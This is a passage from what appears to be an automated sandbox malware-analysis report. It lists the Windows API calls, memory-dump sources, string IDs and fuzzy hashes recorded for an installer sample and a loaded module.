                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36851D58
                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36851D72
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36851D7D
                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 36851D8A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1454806937-0
                                                                                                                                                              • Opcode ID: 6033ba2e642464aef27ae2a398afdab411ef84a0431e288819fb6435517347a4
                                                                                                                                                              • Instruction ID: e9821dc0730ddc2659e0b18b9fadcf1fa4fae599ba5aef06883d01977d9703b6
                                                                                                                                                              • Opcode Fuzzy Hash: 6033ba2e642464aef27ae2a398afdab411ef84a0431e288819fb6435517347a4
                                                                                                                                                              • Instruction Fuzzy Hash: 3021217194121CAFEB109BA4CC8CFEF7AACEB0C358F010566FB51E2140D6749E868A75
                                                                                                                                                              APIs
                                                                                                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 004041FF
                                                                                                                                                              • GetSysColor.USER32(00000000), ref: 0040423D
                                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404249
                                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 00404255
                                                                                                                                                              • GetSysColor.USER32(?), ref: 00404268
                                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 00404278
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404292
                                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 0040429C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2320649405-0
                                                                                                                                                              • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                              • Instruction ID: 212a8ad98d70f233ee07b83b669a1ba7ccffb4b50a3226e4c630c70d8ffb5278
                                                                                                                                                              • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                                                                                              • Instruction Fuzzy Hash: 3B2165716007059BCB309F78DD08B5BBBF4AF85750B04896EFD96A22E0C738E814CB54
                                                                                                                                                              APIs
                                                                                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,36859C07,?,00000000,?,00000000,00000000), ref: 368594D4
                                                                                                                                                              • __fassign.LIBCMT ref: 3685954F
                                                                                                                                                              • __fassign.LIBCMT ref: 3685956A
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 36859590
                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,36859C07,00000000,?,?,?,?,?,?,?,?,?,36859C07,?), ref: 368595AF
                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,36859C07,00000000,?,?,?,?,?,?,?,?,?,36859C07,?), ref: 368595E8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                              • Opcode ID: 618f9ced039679e97dc72ff7d15fb8778630882a8c947eef17736d82a55a6308
                                                                                                                                                              • Instruction ID: f780e8a75bec0bdfa36967cc70fa7098fc2da78194a3f0dbcd87111a85492179
                                                                                                                                                              • Opcode Fuzzy Hash: 618f9ced039679e97dc72ff7d15fb8778630882a8c947eef17736d82a55a6308
                                                                                                                                                              • Instruction Fuzzy Hash: 4C51BFB5D00249AFDF00CFA8C895AEEBBF9EF0C300F15411AEB55E7281D6709946CBA1
                                                                                                                                                              APIs
                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 3685339B
                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 368533A3
                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 36853431
                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 3685345C
                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 368534B1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                              • String ID: csm
                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                              • Opcode ID: b9cc3d6a3b1d4c7aabf4da058ef6a77e52356886a7f9ff01ec4d38829ae28221
                                                                                                                                                              • Instruction ID: 354fcbc3f8be6de402659dec0a1a5d83f80b14521fc97197b40944e1835626c6
                                                                                                                                                              • Opcode Fuzzy Hash: b9cc3d6a3b1d4c7aabf4da058ef6a77e52356886a7f9ff01ec4d38829ae28221
                                                                                                                                                              • Instruction Fuzzy Hash: C741B678E00218DBCF11CF69C840A9EBFB5AF4D328F5181A5EB15AB351E736D905CB91
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenA.KERNEL32(0042A070,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                                                                                              • lstrlenA.KERNEL32(00403233,0042A070,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                                                                                              • lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,?,74DF23A0), ref: 0040527A
                                                                                                                                                              • SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2531174081-0
                                                                                                                                                              • Opcode ID: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                                                                                                              • Instruction ID: 52f605d016cfd88bb70700c5a478074e15cc738f975766ab4ed8c3314b346ff2
                                                                                                                                                              • Opcode Fuzzy Hash: d1e8e7ce2c2523d172669f7ce86ee08a3412313cfa29fa6867aa2e5f83f46da0
                                                                                                                                                              • Instruction Fuzzy Hash: C721AC71900518BBDF119FA5DD8599FBFA8EF04354F1480BAF804B6291C7798E50CF98
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 36859221: _free.LIBCMT ref: 3685924A
                                                                                                                                                              • _free.LIBCMT ref: 368592AB
                                                                                                                                                                • Part of subcall function 3685571E: HeapFree.KERNEL32(00000000,00000000,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?), ref: 36855734
                                                                                                                                                                • Part of subcall function 3685571E: GetLastError.KERNEL32(?,?,3685924F,?,00000000,?,00000000,?,36859276,?,00000007,?,?,36857E5A,?,?), ref: 36855746
                                                                                                                                                              • _free.LIBCMT ref: 368592B6
                                                                                                                                                              • _free.LIBCMT ref: 368592C1
                                                                                                                                                              • _free.LIBCMT ref: 36859315
                                                                                                                                                              • _free.LIBCMT ref: 36859320
                                                                                                                                                              • _free.LIBCMT ref: 3685932B
                                                                                                                                                              • _free.LIBCMT ref: 36859336
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                              • Instruction ID: 67da7f9d6487c9f669cf854fd80a46b9b2e7d1ef8fe697c11bc5a9a673a1a1ae
                                                                                                                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                              • Instruction Fuzzy Hash: 1711BE31941B48FADE20ABB5CD45FEF7BADAF0C300F424824A7B9B6092DB24B4058743
                                                                                                                                                              APIs
                                                                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE9
                                                                                                                                                              • GetMessagePos.USER32 ref: 00404AF1
                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404B0B
                                                                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B1D
                                                                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B43
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                              • String ID: f
                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                              • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                              • Instruction ID: cdc5f22e578355ebae6afd16dcadc4be4e42c2ab1ff41a6041c2d58f87c209b7
                                                                                                                                                              • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                                                                                              • Instruction Fuzzy Hash: 33014C71900219BADB01DBA4DD85BFEBBBCAF55715F10012ABA40B61D0D6B4A9018BA4
                                                                                                                                                              APIs
                                                                                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DD5
                                                                                                                                                              • MulDiv.KERNEL32(?,00000064,?), ref: 00402E00
                                                                                                                                                              • wsprintfA.USER32 ref: 00402E10
                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402E20
                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E32
                                                                                                                                                              Strings
                                                                                                                                                              • verifying installer: %d%%, xrefs: 00402E0A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                              • String ID: verifying installer: %d%%
                                                                                                                                                              • API String ID: 1451636040-82062127
                                                                                                                                                              • Opcode ID: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                                                                                                              • Instruction ID: 65898b716c6b5e3943ed5d7f8865a7929710e3ce64d80c757a7a8fa3a9c1cc58
                                                                                                                                                              • Opcode Fuzzy Hash: 79fc7e6e1ca0acae8e9a75e18e021abc494deab029f93f770ff90eafb88ab8ab
                                                                                                                                                              • Instruction Fuzzy Hash: BD01FF70640209FBEF20AF60DE4AEEE3769AB14345F008039FA06A51D0DBB59D55DB59
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                                                                                                              • wsprintfA.USER32 ref: 004064E2
                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004064F6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                              • String ID: %s%s.dll$UXTHEME$\
                                                                                                                                                              • API String ID: 2200240437-4240819195
                                                                                                                                                              • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                                              • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                                                                                                              • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                                                                              • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,36856FFD,00000000,?,?,?,36858A72,?,?,00000100), ref: 3685887B
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,36858A72,?,?,00000100,5EFC4D8B,?,?), ref: 36858901
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 368589FB
                                                                                                                                                              • __freea.LIBCMT ref: 36858A08
                                                                                                                                                                • Part of subcall function 368556D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 36855702
                                                                                                                                                              • __freea.LIBCMT ref: 36858A11
                                                                                                                                                              • __freea.LIBCMT ref: 36858A36
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                              • Opcode ID: 2b7ed25d2aa6ba919ad5bfa827f1ec796398cbe9d4a3901bb0f2adb605d4f641
                                                                                                                                                              • Instruction ID: 49b25bb4193410c7cf069bc6a99254c015ec171c652d92e3dadc77ab7307caa4
                                                                                                                                                              • Opcode Fuzzy Hash: 2b7ed25d2aa6ba919ad5bfa827f1ec796398cbe9d4a3901bb0f2adb605d4f641
                                                                                                                                                              • Instruction Fuzzy Hash: 2351ECF2A1022EAFEB154E65CC41EBF7765EB48794F120A2AFF14E6180DB34DC50C652
                                                                                                                                                              APIs
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2912456866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2912441896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912471879.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912487312.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2912507249.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                              • Opcode ID: f1d269e6dfcbd70a8fe86ee6d2d0790d6ebe5b5aef851aca50e29501e4bf3e61
                                                                                                                                                              • Instruction ID: 50ad9526884773a844389ca9465edd1da2989015e588fa45899e7f45ead5980e
                                                                                                                                                              • Opcode Fuzzy Hash: f1d269e6dfcbd70a8fe86ee6d2d0790d6ebe5b5aef851aca50e29501e4bf3e61
                                                                                                                                                              • Instruction Fuzzy Hash: 78216D72800128BBDF217FA5CE49D9E7A79EF09364F24423EF550762D1CA794D418FA8
                                                                                                                                                              APIs
                                                                                                                                                              • _strlen.LIBCMT ref: 36851607
                                                                                                                                                              • _strcat.LIBCMT ref: 3685161D
                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3685190E,?,?,00000000,?,00000000), ref: 36851643
                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,3685190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 3685165A
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,3685190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 36851661
                                                                                                                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,3685190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 36851686
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1922816806-0
                                                                                                                                                              • Opcode ID: 0feb909f4b1de2f64b25b40e3119d5135e7753c91e1573d11f22241bd7dc361b
                                                                                                                                                              • Instruction ID: a69508d6770ce8ec2b05581c216fef2ae156964db3123b8f0c62b7a9b868551f
                                                                                                                                                              • Opcode Fuzzy Hash: 0feb909f4b1de2f64b25b40e3119d5135e7753c91e1573d11f22241bd7dc361b
                                                                                                                                                              • Instruction Fuzzy Hash: A721AA36900204ABDB04DF59DC85EFE7BB9EF8C714F15402BEB44AB141EB34A94687B9
                                                                                                                                                              APIs
                                                                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 36851038
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3685104B
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 36851061
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 36851075
                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 36851090
                                                                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 368510B8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3594823470-0
                                                                                                                                                              • Opcode ID: 8dbfe3f5207dd81caeca6cda0d9f469dea07d16e8bc68eba6c5fc999a802f757
                                                                                                                                                              • Instruction ID: 0a321e8d0aa2450dcdec1bc5d184c802a63c5c4330aca0dd3d2103d805633697
                                                                                                                                                              • Opcode Fuzzy Hash: 8dbfe3f5207dd81caeca6cda0d9f469dea07d16e8bc68eba6c5fc999a802f757
                                                                                                                                                              • Instruction Fuzzy Hash: E221A379900318ABCF50DB64DC48EDF3B39EF48314F104296EBA5931A1DE309A96CB41
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,36853518,368523F1,36851F17), ref: 36853864
                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 36853872
                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 3685388B
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,36853518,368523F1,36851F17), ref: 368538DD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                              • Opcode ID: 37078c65ce04804df55df35f0cabf2e2cd4350abe2b2df7b074600052ae2edc0
                                                                                                                                                              • Instruction ID: 3393ccb97b177b2e6a6132eaa0d67d96163e4495336525ed8f13eeef8b341a2d
                                                                                                                                                              • Opcode Fuzzy Hash: 37078c65ce04804df55df35f0cabf2e2cd4350abe2b2df7b074600052ae2edc0
                                                                                                                                                              • Instruction Fuzzy Hash: 1B01F737A5DB156FB608257E6CC6B1E3B56DB1D674722023AE720F90D0FF11480A8347
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,?,36856C6C), ref: 36855AFA
                                                                                                                                                              • _free.LIBCMT ref: 36855B2D
                                                                                                                                                              • _free.LIBCMT ref: 36855B55
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,36856C6C), ref: 36855B62
                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,36856C6C), ref: 36855B6E
                                                                                                                                                              • _abort.LIBCMT ref: 36855B74
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2935893608.0000000036851000.00000040.00001000.00020000.00000000.sdmp, Offset: 36850000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.2935879693.0000000036850000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.2935893608.0000000036866000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_36850000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3160817290-0
                                                                                                                                                              • Opcode ID: cf8799fb5079bd55a34da92be84120ab8bf9e47a6122012f4772691d11c33db6
